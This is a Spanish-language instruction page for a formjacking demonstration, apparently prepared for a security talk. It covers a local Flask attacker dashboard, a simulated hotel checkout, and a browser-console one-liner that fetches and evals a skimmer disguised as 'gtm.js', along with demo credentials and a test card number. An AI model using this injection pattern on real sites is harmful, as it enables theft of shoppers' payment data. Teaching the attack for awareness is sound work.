Demostración Educativa de Formjacking
Panel de control donde se visualizan las capturas en tiempo real (simulando el dashboard del atacante).
Acceder al PanelSitio web simulado de reserva de hotel donde se inyectará el script malicioso.
Ir al CheckoutScript JavaScript que captura los datos del formulario y los envía al backend.
Ver ScriptEjecutar el servidor Flask en una terminal:
python3 app.py
Abrir en una pestaña: http://localhost:5000/dashboard
Credenciales: admin / DragonJAR2026
En otra pestaña: http://localhost:5000/demo
Abrir la consola del navegador (F12) en la pestaña del checkout y pegar:
fetch('http://localhost:5000/static/gtm.js').then(r=>r.text()).then(eval)
O copiar y pegar el contenido completo del archivo injector.js
Llenar el formulario con datos de prueba (tarjeta falsa: 4111111111111111)
Hacer clic en "Realizar Pago" y ver cómo los datos aparecen en el panel administrativo en tiempo real.
En el panel admin, hacer clic en "Revelar" para mostrar el número completo de tarjeta y explicar el ciclo del ataque.
Puntos clave para mencionar en la charla:
Datos para contextualizar: